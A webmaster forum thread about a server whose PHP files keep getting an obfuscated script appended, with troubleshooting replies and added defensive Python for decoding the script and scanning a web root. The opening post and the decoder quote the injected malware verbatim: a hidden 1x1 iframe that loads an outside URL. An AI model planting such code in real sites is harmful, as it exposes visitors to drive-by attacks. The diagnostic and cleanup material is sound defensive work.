Server comprimised, now what?

  • camperjohn64
    Confirmed User
    • Feb 2005
    • 1531

    #1

    Server comprimised, now what?

    I am getting this script, attached to the end of my PHP scripts all over my server:

    Code:
    <script>yd='co';mh='m';im='a.';rm='h';my='5';t='m/';qg='v';vp='if';x='me';a='p:/';gv='a';q='/r';xk='.';ei='htt';y='k';cw='9';w='s';u='8';dk='ra';f='ytv';iy='e';l='jus';b='ew';hh='rc';h='t';vu=vp.concat(dk,x);qm=w.concat(hh);ka=ei.concat(a,q,b,gv,l,iy,qg,im,yd,t,y,cw,u,my,f,xk,rm,h,mh);var tq=document.createElement(vu);tq.setAttribute('width','1');tq.setAttribute('height','1');tq.frameBorder=0;tq.setAttribute(qm,ka);document.body.appendChild(tq);</script>
    I wrote a script to delete it, changed the passwords, but it's still showing up ever xxx hours.

    Now what??!!?!!

    1) How can I find if the server is compromised?

    2) How can I find if it's a script on my server that is automatically adding it?

    3) What to do??

    JM

    Here is what I find on the net about that script:

    http://blog.unmaskparasites.com/2011...ction-k985ytv/
    Last edited by camperjohn64; 08-25-2011, 08:09 AM.
    www.gimmiegirlproductions.com
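    The obfuscated tag above is only a string-concatenation puzzle, and the first thing a defender wants is to know what it does without executing it. The following is an added example, written for this thread and not code from the original poster or from the unmaskparasites article: a small static decoder that handles this particular family (single-quoted fragments glued with String.prototype.concat, then createElement/setAttribute). The SAMPLE constant is the script quoted in the post above, copied verbatim; the regexes and the function names are assumptions of this example and will not cover arbitrary JavaScript.

```python
import re

# Verbatim copy of the injected tag quoted in the opening post (the thread's own
# sample, not something constructed for this example).
SAMPLE = (
    "<script>yd='co';mh='m';im='a.';rm='h';my='5';t='m/';qg='v';vp='if';x='me';"
    "a='p:/';gv='a';q='/r';xk='.';ei='htt';y='k';cw='9';w='s';u='8';dk='ra';"
    "f='ytv';iy='e';l='jus';b='ew';hh='rc';h='t';vu=vp.concat(dk,x);qm=w.concat(hh);"
    "ka=ei.concat(a,q,b,gv,l,iy,qg,im,yd,t,y,cw,u,my,f,xk,rm,h,mh);"
    "var tq=document.createElement(vu);tq.setAttribute('width','1');"
    "tq.setAttribute('height','1');tq.frameBorder=0;tq.setAttribute(qm,ka);"
    "document.body.appendChild(tq);</script>"
)

# name='literal'            -> a string fragment
# name=head.concat(a,b,...) -> fragments glued together
LITERAL_RE = re.compile(r"\b(\w+)='([^']*)'")
CONCAT_RE = re.compile(r"\b(\w+)=(\w+)\.concat\(([^)]*)\)")
CREATE_RE = re.compile(r"createElement\((\w+)\)")
SETATTR_RE = re.compile(r"setAttribute\(([^,)]+),\s*([^)]+)\)")


def resolve_vars(js):
    """Return {name: string} for every string variable, with concat() chains
    evaluated in source order. Nothing is executed; this is text processing only."""
    names = {name: value for name, value in LITERAL_RE.findall(js)}
    for target, head, args in CONCAT_RE.findall(js):
        parts = [head] + [a.strip() for a in args.split(",") if a.strip()]
        names[target] = "".join(names[p] for p in parts)
    return names


def _arg(token, names):
    """A setAttribute argument is either a quoted literal or a variable name."""
    token = token.strip()
    if token.startswith("'") and token.endswith("'"):
        return token[1:-1]
    return names[token]


def describe(js):
    """Recover the element created, its attributes, and whether it is sized to be
    invisible (1x1), which is the tell-tale shape of a drive-by iframe injection."""
    names = resolve_vars(js)
    match = CREATE_RE.search(js)
    element = names[match.group(1)] if match else None
    attrs = {_arg(k, names): _arg(v, names) for k, v in SETATTR_RE.findall(js)}
    hidden = attrs.get("width") == "1" and attrs.get("height") == "1"
    return {"element": element, "attributes": attrs, "hidden": hidden}


if __name__ == "__main__":
    info = describe(SAMPLE)
    print("element:", info["element"], "(hidden)" if info["hidden"] else "")
    for key, value in info["attributes"].items():
        print(f"  {key} = {value}")
```

The decoded `src` value is the string to grep for across the web root and in the web server and FTP logs, since the raw tag never contains it in one piece; that is also why a plain search for the URL misses infected files.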
  • bronco67
    Too lazy to set a custom title
    • Dec 2006
    • 29032

    #2
    Your spelling skills have been compromised. Sorry, I couldn't resist.

    Comment

    • 96ukssob
      So Fucking Banananananas
      • Mar 2003
      • 12991

      #3
      sounds like you have a virus on your server, not that someone hacked it. had this happen a few years ago with a shitty host and had the same problem.

      ask your host to run a virus scan or install some virus software. change all passwords, including root and disable SSH users (only 1 if you use it) and make sure if you have a way to upload files to one of your sites (i.e. videos) that you only allow certain formats and exclude .exe, etc, files.
      Email: Clicky on Me

      Comment

      • baddog
        So Fucking Banned
        • Apr 2001
        • 107089

        #4
        Contact your host.

        Comment

        • Klen
          • Aug 2006
          • 32235

          #5
          You should be able to figure that out by yourself, I mean you are a hardcore programmer so you should be more qualified than me, for example. Unless I mistook you for someone else.

          Comment

          • bns666
            Confirmed Fetishist
            • Mar 2005
            • 11554

            #6
            btw also check your win pc/laptop where you have saved ftp/ssh access passwords for your server, the problem might be there, not on the server.

            happened to me a few years ago.
            CAM SODASTRIPCHAT
            CHATURBATEX LOVE CAM

            Comment

            • scuba steve
              Confirmed User
              • Oct 2008
              • 1888

              #7
              hosting company should be able to fix/remedy it

              isprime is always on top of this for us, most companies are

              Comment

              • Connor
                Confirmed User
                • Feb 2003
                • 1294

                #8
                Who does your sys admin? You can hire someone if you have the budget for it.


                YNOT v5 IS NOW LIVE! | SEEN YNOT MAIL YET?

                Comment

                • camperjohn64
                  Confirmed User
                  • Feb 2005
                  • 1531

                  #9
                  Originally posted by bronco67
                  Your spelling skills have been compromised. Sorry, I couldn't resist.
                  Thanks.

                  I changed all passwords, disabled most ssh access. I read it is an FTP stolen-password problem, so perhaps changing passwords will fix it.

                  The real problem is, I am the host, and this is my first co-located server. I sense a learning experience coming on...
                  www.gimmiegirlproductions.com

                  Comment

                  • rowan
                    Too lazy to set a custom title
                    • Mar 2002
                    • 17393

                    #10
                    If you're lucky it's just a script hole rather than a full blown server compromise. The code keeps reappearing because you're treating the symptom (deleting the code) rather than the problem (how they're creating that code).

                    Your host should be the first step in asking for help. Ask if any unusual IPs have accessed your account via FTP. They may also be able to check web server logs for suspicious activity.

                    As the article you linked suggests, the problem may be related to your own computer, i.e. something running in the background and sniffing passwords.

                    Comment

                    • rowan
                      Too lazy to set a custom title
                      • Mar 2002
                      • 17393

                      #11
                      Originally posted by camperjohn64
                      The real problem is, I am the host, and this is my first co-located server. I sense a learning experience coming on...
                      Ok, well that complicates things a bit. Do you know anything about server admin? And I don't mean clicking buttons on a control panel webpage...

                      Comment

                      • raymor
                        Confirmed User
                        • Oct 2002
                        • 3745

                        #12
                        The second half of this page will give you a general outline as to how to
                        secure your server - fixing stupid default PHP settings, getting rid of unused scripts,
                        turning off suexec for sure, etc.:

                        https://bettercgi.com/strongbox/pass...adyhacked.html

                        Of course there have been 1,200 page books written on the topic, so that one page
                        isn't comprehensive. You may need to talk to someone who has read the 1200 page books.
                        If they can't get it, talk to someone who has WRITTEN one of the 1200 page books.
                        For historical display only. This information is not current:
                        support@bettercgi.com ICQ 7208627
                        Strongbox - The next generation in site security
                        Throttlebox - The next generation in bandwidth control
                        Clonebox - Backup and disaster recovery on steroids

                        Comment

                        • camperjohn64
                          Confirmed User
                          • Feb 2005
                          • 1531

                          #13
                          Originally posted by rowan
                          Ok, well that complicates things a bit. Do you know anything about server admin? And I don't mean clicking buttons on a control panel webpage...
                          Yes, actually I don't use a control panel. I wanted to make sure I learned all the linux command line issues from the ground up. I have webmin, but never use it. Maybe I should disable that.

                          I have updated all software, changed all passwords, no suexec, changed ports for ssh, turned off all default settings for apache / php / phpmyadmin.

                          The server is at 67.21.112.158...please test if you can get in or there is something I should fix asap.

                          Oops, first thing is to change the default welcome page. :-(
                          www.gimmiegirlproductions.com

                          Comment

                          • camperjohn64
                            Confirmed User
                            • Feb 2005
                            • 1531

                            #14
                            Originally posted by rowan
                            If you're lucky it's just a script hole rather than a full blown server compromise. The code keeps reappearing because you're treating the symptom (deleting the code) rather than the problem (how they're creating that code)
                            ...
                            I think this is the case. On accounts that I have changed the passwords on, it *appears to no longer be infecting those accounts.

                            I'm a good php programmer, but a lousy admin.
                            www.gimmiegirlproductions.com

                            Comment

                            • PornDiscounts-R
                              Confirmed User
                              • Aug 2006
                              • 1272

                              #15
                              Originally posted by camperjohn64
                              I think this is the case. On accounts that I have changed the passwords on, it *appears to no longer be infecting those accounts.

                              I'm a good php programmer, but a lousy admin.
                              The url in your sig is giving a nice big trojan warning too
                              Email# rasmus(you*know)porndiscounts.com

                              Comment

                              • camperjohn64
                                Confirmed User
                                • Feb 2005
                                • 1531

                                #16
                                Originally posted by thebestamateur
                                The url in your sig is giving a nice big trojan warning too
                                Thank you. Fixing.

                                I think I will turn off proftp for a few hours and see if the script appears. This will confirm if it's getting in through that.
                                www.gimmiegirlproductions.com

                                Comment

                                • Babaganoosh
                                  ♥♥♥ Likes Hugs ♥♥♥
                                  • Nov 2001
                                  • 15841

                                  #17
                                  FTP? Yikes, don't use FTP. Remove any ftp daemon on the box and use SSH.
                                  I like pie.

                                  Comment

                                  • iamtam
                                    So Fucking Banned
                                    • Feb 2010
                                    • 1211

                                    #18
                                    it probably isn't ftp. it is probably some out of date software on your machine with an sql injection or overflow that allows them to access your machine. check all software you use (like wordpress, phpmyadmin, or others) for more recent updates. check for files with 777 permissions, which is always a problem and check things like upload directories for .jpg.php files (which usually pass sanitizers).

                                    Comment

                                    • CYF
                                      Coupon Guru
                                      • Mar 2009
                                      • 10973

                                      #19
                                      there is malware for PCs that will use your stored FTP passwords and upload crap to your servers. Might want to check into that as well.
                                      Webmaster Coupons Coupons and discounts for hosting, domains, SSL Certs, and more!
                                      AmeriNOC Coupons | Certified Hosting Coupons | Hosting Coupons | Domain Name Coupons

                                      Comment

                                      • Babaganoosh
                                        ♥♥♥ Likes Hugs ♥♥♥
                                        • Nov 2001
                                        • 15841

                                        #20
                                        Are you a filezilla user by chance? This is something they're faced with more and more often.
                                        I like pie.

                                        Comment

                                        • camperjohn64
                                          Confirmed User
                                          • Feb 2005
                                          • 1531

                                          #21
                                          Originally posted by CYF
                                          there is malware for PCs that will use your stored FTP passwords and upload crap to your servers. Might want to check into that as well.
                                          I think this was the case. I reformatted my main machine about two weeks ago because "something funny" was going on. That was the only machine that I was using to upload to the sites that were hacked.

                                          So the root SSH was not compromised, nor were any accounts for friends that I am hosting. Suggesting the problem was that machine was freely sending out passwords.

                                          All accounts changed, new machine has new virus software on it, server "appears" stable as of 10am...

                                          The good thing is that it appears my home machine was hacked, not the server itself. Also, I don't have any ability to FTP to any sites that are important. Only ssh on non-standard ports.

                                          I will disable remote-root password ability once this blows over. Must login to another account, then su if I want to get to root - I forget what that feature is called.
                                          www.gimmiegirlproductions.com

                                          Comment

                                          • livexxx
                                            Confirmed User
                                            • May 2005
                                            • 1201

                                            #22
                                            quite often someone will have uploaded a script somehow onto the server that is sitting in an image upload dir or some other directory. They can then call that up every now and then and it just fires off and scans all your dirs and adds that script to the end of files. So changing your passwords etc is like after the horse has bolted. try doing something like scan all your files for some of those data patterns providing they didn't encrypt their upload.
                                            http://www.webcamalerts.com for auto tweets for web cam operators

                                            Comment
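                                            Posts #18 and #22 together describe the three checks an admin without a control panel would actually run: look for files carrying the injected pattern, look for world-writable files and directories, and look for double-extension uploads such as `.jpg.php` in upload directories. The block below is an added example written for this thread, not code from any poster. It builds a constructed throw-away web root (tempfile) so it runs offline; the signature regex matches the concat()-then-appendChild shape of the sample in post #1 rather than the exact string, and the extension lists and function names are assumptions of this example.

```python
import os
import re
import stat
import tempfile

# Obfuscation shape from the thread's sample: fragments glued with concat(), then an
# element appended to document.body. Legitimate templates rarely contain both.
INJECTION_RE = re.compile(rb"\.concat\([^)]*\)[\s\S]*document\.body\.appendChild")
# "photo.jpg.php" style names that an extension whitelist can let through.
DOUBLE_EXT_RE = re.compile(r"\.(jpe?g|png|gif)\.(php\d?|phtml|phps)$", re.I)
# Only text-like files are opened for the signature search.
SCANNED_EXTS = (".php", ".phtml", ".inc", ".html", ".htm", ".js")


def scan_tree(root):
    """Walk root and return relative paths grouped by finding type."""
    findings = {"injected": [], "world_writable": [], "double_ext": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            # 777/666 style modes: anyone on the box (or any web process) can write here.
            if not stat.S_ISLNK(st.st_mode) and st.st_mode & stat.S_IWOTH:
                findings["world_writable"].append(os.path.relpath(path, root))
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if DOUBLE_EXT_RE.search(name):
                findings["double_ext"].append(rel)
            if name.lower().endswith(SCANNED_EXTS):
                try:
                    with open(path, "rb") as fh:
                        if INJECTION_RE.search(fh.read()):
                            findings["injected"].append(rel)
                except OSError:
                    continue
    for key in findings:
        findings[key].sort()
    return findings


def build_sample_tree():
    """Constructed web root for demonstration: one clean file, one file with an
    injected tail, a world-writable upload directory and a double-extension upload."""
    root = tempfile.mkdtemp(prefix="webroot_")
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    # Constructed stand-in for the injected tail, same shape as the thread's sample.
    injected = ("<?php include 'header.php'; ?>\n<script>a='if';b='rame';c=a.concat(b);"
                "var e=document.createElement(c);document.body.appendChild(e);</script>")
    with open(os.path.join(root, "footer.php"), "w") as fh:
        fh.write(injected)
    with open(os.path.join(uploads, "photo.jpg.php"), "w") as fh:
        fh.write("<?php /* placeholder content */ ?>")
    with open(os.path.join(uploads, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff")
    os.chmod(uploads, 0o777)
    os.chmod(os.path.join(uploads, "photo.jpg.php"), 0o666)
    return root


if __name__ == "__main__":
    for kind, paths in scan_tree(build_sample_tree()).items():
        print(kind, paths)
```

Pointing `scan_tree` at the real document root gives the list of files to clean and, more usefully, the writable directories and stray `.php` uploads that explain how the tail keeps coming back after the passwords were changed; cross-checking the modification times of the hits against the access log narrows down which request wrote them.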

                                            • CYF
                                              Coupon Guru
                                              • Mar 2009
                                              • 10973

                                              #23
                                              Originally posted by camperjohn64
                                              I will disable remote-root password ability once this blows over. Must login to another account, then su if I want to get to root - I forget what that feature is called.
                                              are you talking about using public keys instead of passwords? That's what I do on my machines.

                                              I would also suggest not using ftp anymore. sftp is so much better. Also would recommend against storing passwords anywhere.
                                              Webmaster Coupons Coupons and discounts for hosting, domains, SSL Certs, and more!
                                              AmeriNOC Coupons | Certified Hosting Coupons | Hosting Coupons | Domain Name Coupons

                                              Comment

                                              • camperjohn64
                                                Confirmed User
                                                • Feb 2005
                                                • 1531

                                                #24
                                                Originally posted by livexxx
                                                quite often someone will have uploaded a script somehow onto the server that is sitting in an image upload dir or some other directory. They can then call that up every now and then and it just fires off and scans all your dirs and adds that script to the end of files. So changing your passwords etc is like after the horse has bolted. try doing something like scan all your files for some of those data patterns providing they didn't encrypt their upload.
                                                I turned off proftpd and the script is still being added to the files. This means it isn't an FTP upload / password issue. The horse has bolted.

                                                This means the server is infected with something.

                                                It seems this will be my project for tonight. Must eat dinner now, but will try to find it.

                                                Thoughts?
                                                www.gimmiegirlproductions.com

                                                Comment

                                                • HomerSimpson
                                                  Too lazy to set a custom title
                                                  • Sep 2005
                                                  • 13826

                                                  #25
                                                  now you hire me...

                                                  www.awmzone.com/services
                                                  Make a bank with Chaturbate - the best selling webcam program
                                                  Ads that can't be blocked with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!!

                                                  PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 | Email:

                                                  Comment
